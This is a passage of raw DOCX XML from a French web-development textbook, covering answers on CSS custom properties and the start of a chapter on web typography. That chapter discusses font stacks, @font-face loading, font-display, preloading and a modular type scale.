        <w:t xml:space="preserve"> distingue le focus clavier du focus souris, ce qui permet de n'afficher le contour que lorsqu'il est utile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les propriétés personnalisées commencent par deux tirets et se lisent avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var(--couleur)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> correspond à la largeur du caractère 0 dans la police utilisée, ce qui donne une mesure fidèle du nombre de caractères par ligne.</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Le second argument est la valeur de repli utilisée lorsque la variable n'est pas définie.</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Un sélecteur dépendant de la profondeur devient faux au moindre changement de structure ; un nom de rôle est plus durable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>11. Typographie web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Quatre-vingt-dix pour cent du Web est du texte. Le soigner n'est pas un luxe, c'est la condition de la lecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Débutant · Prérequis : chapitre 10</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Choisir des polices lisibles et performantes.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Construire une échelle typographique cohérente.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Régler interligne, mesure et espacement pour la lecture.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Charger des polices personnalisées sans dégrader la performance.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Adapter la typographie à l'impression et aux lecteurs d'écran.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 Choisir une police</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois options s'offrent à un projet web : les polices système, les polices auto-hébergées et les polices de services externes. Le choix engage la performance, la vie privée et l'identité visuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.37 — Trois stratégies de polices et leurs compromis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13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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Avantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Inconvénients</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Polices système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun téléchargement, rendu immédiat</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Choix limité, rendu variable selon l'OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Auto-hébergement</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Contrôle total, respect de la vie privée</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Poids à optimiser soi-même</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Catalogue immense, mise en œuvre rapide</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Requête tierce, RGPD à vérifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une pile système bien construite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Pile système : aucun fichier à télécharger */</w:t>
        <w:br/>
        <w:t>body {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: system-ui, -apple-system, "Segoe UI", Roboto,</w:t>
        <w:br/>
        <w:t xml:space="preserve">               "Helvetica Neue", Arial, sans-serif;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>h1, h2, h3 {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Iowan Old Style", "Palatino Linotype", Georgia, serif;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La pile liste des familles par ordre de préférence, et se termine toujours par une famille générique (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>serif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sans-serif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>monospace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Sans cette dernière, le navigateur choisit lui-même, souvent mal.</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POLICE VARIABLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier unique contenant plusieurs graisses et largeurs, animables par l'axe </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>wght</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Il remplace plusieurs fichiers statiques et allège le chargement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 Charger une police correctement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une police personnalisée est un fichier lourd, souvent 100 à 400 kilo-octets par graisse. Trois décisions réduisent son coût : limiter les graisses, sous-ensembler les caractères, et contrôler l'affichage pendant le chargement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une déclaration de police complète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@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: url("fonts/inter-var.woff2") format("woff2-variations");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 100 900;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-display: swap;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  unicode-range: U+0000-00FF, U+0131, U+0152-0153;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Tableau 0.38 — Cinq descripteurs de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>@font-face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57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Descripteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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289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Valeur recommandée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichier et format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>woff2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, le plus léger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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font-weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Graisses couvertes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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Plage pour une variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>font-display</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Affichage pendant le chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>swap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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unicode-range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Sous-ensemble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="289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Latin de base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>font-style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Styles couverts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>normal</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>italic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche immédiatement une police de substitution, puis remplace le texte une fois la police chargée. Le texte reste lisible dès la première seconde, au prix d'un léger décalage visuel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Précharger la police principale, et elle seule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&lt;link rel="preload" href="fonts/inter-var.woff2" as="font"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      type="font/woff2" crossorigin&gt;</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UNE POLICE, UN FICHIER, UN COÛT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chaque graisse téléchargée retarde le premier rendu. Deux familles et trois graisses constituent déjà un maximum raisonnable. Une police variable couvre l'ensemble des graisses en un seul fichier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f14.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.14 — Deux stratégies de chargement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.3 Construire une échelle typographique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une échelle est une suite de tailles reliées par un rapport constant. Elle évite les valeurs arbitraires (17 px, 23 px, 31 px) et donne un rythme visuel cohérent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f15.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.15 — Une échelle modulaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une échelle calculée à partir d'un seul rapport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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ratio: 1.25;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-0: 1rem;</w:t>
        <w:br/>
